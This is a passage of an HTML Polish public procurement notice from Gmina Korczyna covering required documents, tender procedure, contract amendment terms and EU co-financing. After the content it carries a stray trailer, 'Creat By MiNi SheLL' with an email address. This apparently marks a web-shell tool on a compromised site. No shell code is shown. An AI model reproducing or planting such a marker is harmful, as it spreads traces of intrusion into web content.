<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.3.2)</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 10 -11 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>do oferty wykonawca dołączy kosztorys</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zgodnie z art. 144 ust. 1 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (Dz.U. z 2010r. Nr 113, poz. 759 z późn. zm.) Zamawiający dopuszcza możliwość zmiany umowy zawartej z Wykonawcą. 
 2. Termin realizacji zamówienia może ulec zmianie w następujących sytuacjach:
a/ w przypadku opóźnienia Zamawiającego w rozstrzygnięciu przetargu,
b) w przypadku opóźnienia Zamawiającego w przekazaniu placu budowy,
c/ opóźnień Zamawiającego w zakresie dokonywania odbiorów,
d/ zawieszenia robót przez Zamawiającego,
e/ wyjątkowo niesprzyjających warunków atmosferycznych,
f/  innych przeszkód uniemożliwiających prowadzenie robót, za które nie odpowiada wykonawca,
3.Wynagrodzenie Wykonawcy określone w umowie może ulec zmianie w następujących przypadkach:
a/ zmiana stawki urzędowej podatku VAT,
b/ rezygnacja z części robót, jeśli taka rezygnacja będzie niezbędna do prawidłowej realizacji przedmiotu umowy lub których wykonanie nie będzie konieczne lub będzie bezcelowe w przypadku zaistnienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy - o wartość niewykonanych robót.
4. Inne zmiany:
a/ w zakresie kluczowego personelu Wykonawcy, za uprzednią zgodą Zamawiającego wyrażoną na piśmie, akceptującą kandydata na kluczowe stanowisko kierownicze, 
b/ w zakresie podwykonawstwa  za uprzednią zgodą Zamawiającego:
- powierzenie podwykonawcom innej części robót niż wskazana w ofercie Wykonawcy,
- zmiana podwykonawcy na etapie realizacji robót,
c/ w zakresie kolejności i terminów wykonywania robót, 
5. Warunki zmian:
a/ inicjowanie zmian - na pisemny wniosek Wykonawcy lub Zamawiającego,
b/ uzasadnienie zmian - prawidłowa realizacja przedmiotu umowy, obniżenie kosztów, zapewnienie optymalnych parametrów technicznych i jakościowych robót,
c/ forma zmian - aneks do umowy w formie pisemnej pod rygorem nieważności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.korczyna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Korczyna
38-420 Korczyna ul. Rynek 18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.05.2013 godzina 09:30, miejsce: Urząd Gminy Korczyna
38-420 Korczyna ul. Rynek 18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie współfinansowane jest ze środków Regionalnego Programu Operacyjnego Województwa Podkarpackiego na lata 2007-2013 - działanie Infrastruktura Energetyczna.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com